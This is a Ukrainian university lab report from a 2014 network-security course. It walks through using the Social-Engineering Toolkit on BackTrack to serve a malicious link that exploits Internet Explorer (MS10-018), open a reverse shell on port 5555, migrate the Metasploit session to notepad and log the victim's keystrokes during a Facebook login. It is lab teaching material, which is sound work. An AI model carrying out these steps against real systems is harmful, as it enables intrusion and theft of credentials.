МІНІСТЕРСТВО ОСВІТИ І НАУКИ УКРАЇНИ
НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ ”ЛЬВІВСЬКА ПОЛІТЕХНІКА”
ІКТА
кафедра захисту інформації
ЗВІТ
до лабораторної роботи № 4
з курсу
«Методи та засоби захисту інформації в комп'ютерних мережах»
на тему
«Соціал-інжиніринг Toolkit. Створення шкідливих Weblink для сніфінгу натиснення клавіш жертви»
Львів – 2014
МЕТА РОБОТИ:
Створення шкідливого веб-посилання для сніфінгу натиснення клавіш жертви за допомогою інструментарію Social-Engineering Toolkit.
КОРОТКІ ТЕОРЕТИЧНІ ВІДОМОСТІ:
Що таке Social-Engineering Toolkit (SET)
Social-Engineering Toolkit (SET) - це набір користувальницьких інструментів, які виключно зосереджені на атакуючий людський фактор тестування на проникнення.
Основною метою є збільшення і моделювання соціально-інженерної атаки і дозволити тестеру ефективно перевірити, як цільові атаки можуть домогтися успіху.
Social-Engineering toolkit доступна на Backtrack, як на Backtrack 5, Backbox, Blackbuntu, Gnacktrack і іншими збірками, які використовуються для тестування на проникнення.
Примітка до соціальної інженерії
Зображення зловмисник вкладення шкідливому посиланню (див. розділ 4, Крок 9) в електронній пошті можливі жертви.
Жертва не перевіряє посилання, перш ніж він натискає на неї, щоб помітити, що посилання IP-адреси замість доменних імен. Крім того, IP-адрес, слухає інший порт.
(http://192.168.1.105:8080)
Даний вид атаки особливо небезпечний, тому що він виходить з ладу веб-браузер жертви, і жертви не розуміють, що далі відбувається:
Metasploit корисного навантаження вводить їх в системи
Сесії Metasploit прикріплена до своєї системи
Прикладена сесія була перенесена з iexplorer.exe до notpad.exe.
Правове застереження
Ви не будете використовувати ці навики для будь-яких цілей, які є незаконними або заборонені.
Вас попереджають, що використання програми за межами вашого тестового середовища вважається шкідливим і є порушенням закону.
ХІД РОБОТИ:
1. НАЛАШТУВАННЯ BACKTRACK ПАРАМЕТРІВ ВІРТУАЛЬНОЇ МАШИНИ
Відкрийте ваш VMware Player
Інструкція:
1. На вашому комп’ютері перейдіть до
Start --> All Program --> VMWare --> VMWare Player
2. Редагувати BackTrack параметри віртуальної машини
Інструкція:
1. Highlight BackTrack5R1
2. Натисніть “Edit virtual machine settings”
3. Налаштуйте мережевий адаптер
Інструкція:
1. Highlight Network Adapter
2. Виберіть Bridged
3. Не натискайте кнопку OK .
2. ВХІД ДО BACKTRACK
1. Запустити BackTrack VM Instance
Інструкція:
Почати VMWare Player
Вибрати BackTrack5R1
Play virtual machine
2. Вхід до BackTrack
Інструкція:
Login: root
Password: toor або <той, на який ви змінили>.
3. Викликати GNOME
Інструкція:
Тип startx
3. ВІДКРИВАННЯ КОНСОЛІ ТЕРМІНАЛУ ТА ОТРИМАННЯ IP-АДРЕСИ
1. Відкрийте консоль терміналу
Інструкція:
Натиснути на консоль терміналу
2. Отримати IP Address
Інструкція:
ifconfig -a
Примітка:
Як зазначено нижче, мій IP адрес 192.168.1.105.
Будь ласка, запишіть свій IP адрес.
4. ПОЧАТОК РОБОТИ SOCIAL ENGINEERING TOOLKIT
1. Почати Social Engineering ToolKit
Інструкція:
1. cd /pentest/exploits/set
2. ./set
Веб-сайт атака
Інструкція:
Вибрати 2
3. Вибрати метод Metasploit Browser Exploit
Інструкція:
Вибрати 2
4. Вибрати Веб-шаблони
Інструкція:
Вибрати 1
5. Встановіть веб-атаки
Інструкція:
Вибрати 3
6. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
Інструкція:
Вибрати 15
7. Windows Shell Reverse_TCP
Інструкція:
1. Select 1
8. Установка зворотнього порту
Інструкція:
1. Установити на 5555
9. Почекайте запуску сервера
Інструкція:
Скопіюйте веб-посилання, вказану вище сервер почав лінію.
Переходьте до наступного розділу.
Примітка:
Це шкідливе веб-посилання, яке буде використовуватися зловмисником для соціальної інженерії, їхній шлях до машини жертви.
5. ЗАПУСК МАШИНИ WINDOWS
Примітка до соціальної інженерії
Уявіть, як атакуючий може впровадити зловмисне посилання, зазначене в розділі 4, крок 9 в електронній пошті до можливих жертв.
Даний вид атаки особливо небезпечний, тому що він виводить з ладу веб-браузер жертви, і жертви не розуміють Metasploit корисного навантаження був введений і сесії тепер прикріплені до процесу міграції блокнот.
1. Завантаження до WindowsVulerable01
Інструкція:
Запустіть VMware Player
Виберіть WindowsVulerable01
Налаштуйте Virtual Machine
2. Налаштування Network Adapter
Інструкція:
Виберіть Network Adapter
Виберіть Bridged Connection
Натисніть OK
3.Запустіть WindowVulnerable01
Інструкція:
1. Виберіть Play virtual Machine
4. Аутентифікація WindowsVulerable01
Інструкція:
1. Увійдіть як адміністратор
6. Запустіть Web Browser
1. Запустіть Internet Explorer
Інструкція:
Start --> All Programs --> Internet Explorer
2. Жертва натискає на посилання
Інструкція:
Встановіть IP BackTrack в адресному рядку.
В нашому випадку, http://192.168.1.105:8080/
У вашому випадку, візміть IP адрес з Розділу 5, Крок 9.
Веб-браузер буде просто зломаний.
7. АНАЛІЗ РЕЗУЛЬТАТІВ ПІСЛЯ ВЗЛОМУ БРАУЗЕРА
1. Запустити командну строку
Інструкція:
All Programs --> Accessories --> Command Prompt
2. Запустити командну строку
Інструкція:
netstat -nao | findstr 5555
tasklist | findstr 2976
2976 - процес ID для сесії Metasploit, йде на порту 5555.
У вашому випадку, процес ID ймовірно буде відмінний.
3. tasklist | findstr notepad
Завдання лабораторної:
1. date
2. echo "Your Name"
1. Where the string "Your Name" is your actual name.
2. e.g., echo "John Gray"
3. Зробіть PrtScn
4. Вставити у документ Word
8. УВІЙДІТЬ НА ЗЛОМАНУ МАШИНУ
1. Отримайте негайно MSF
Інструкція:
Натисніть <Enter>, коли побачите notepad.exe line.
2. Отримайте командний рядок жертви
Інструкція:
sessions
sessions -i 1
execute -f cmd.exe -i –M
3. Запустіть удар по системі натисненням клавіші
Інструкція:
1. Натисніть <Ctrl> and "z" key at the same time.
Це помістить сесію 1 у попередній фон.
2. y
3. keyscan_start
4. Перейдіть до наступної секції.
9. ВХІД У FACEBOOK
1. Запустіть Internet Explorer
Інструкція:
Start --> All Programs --> Internet Explorer
2. Вхід у Facebook
Інструкція:
1. Email: Використовуйте підроблену адресу
first.last@victim.com, де спочатку - ваше ім'я і в кінці - ваше прізвище.
e.g., john.gray@victim.com
Password: Який ви хочете.
10. ПОДИВІТЬСЯ НА КЛАВІШУ ВЗЛОМУ
1. Вийдіть з меню мережевого нападу
Інструкція:
1. keyscan_dump
This will proceduce the Facebook
2. keyscan_stop
Завдання лабораторної #2:
Зробіть PrtScan
Вставте в той самий документ, що і в завданні#1.
11. ЗАВДАННЯ ДО ЛАБОРАТОРНОЇ
1. Завдання до лабораторної
Інструкція:
Інструкція до завдання #1 (Дивитись Розділ 7, Крок 2)
Інструкція до завдання #2 (Дивитись Розділ 10, Крок 1)
ВИСНОВОК:
Здійснив створення шкідливого веб-посилання для сніфінгу натиснення клавіш жертви за допомогою інструментарію Social-Engineering Toolkit. Social-Engineering Toolkit (SET) - це набір користувальницьких інструментів, які виключно зосереджені на атакуючий людський фактор тестування на проникнення.
Основною метою є моделювання соціально-інженерної атаки і дозволити тестеру ефективно перевірити, як цільові атаки можуть домогтися успіху. Даний вид атаки особливо небезпечний, тому що він виходить з ладу веб-браузер жертви, і жертви не розуміють, що далі відбувається:
Metasploit корисного навантаження вводить їх в систему
Сесії Metasploit прикріплена до своєї системи
Прикладена сесія була перенесена з iexplorer.exe до notpad.exe.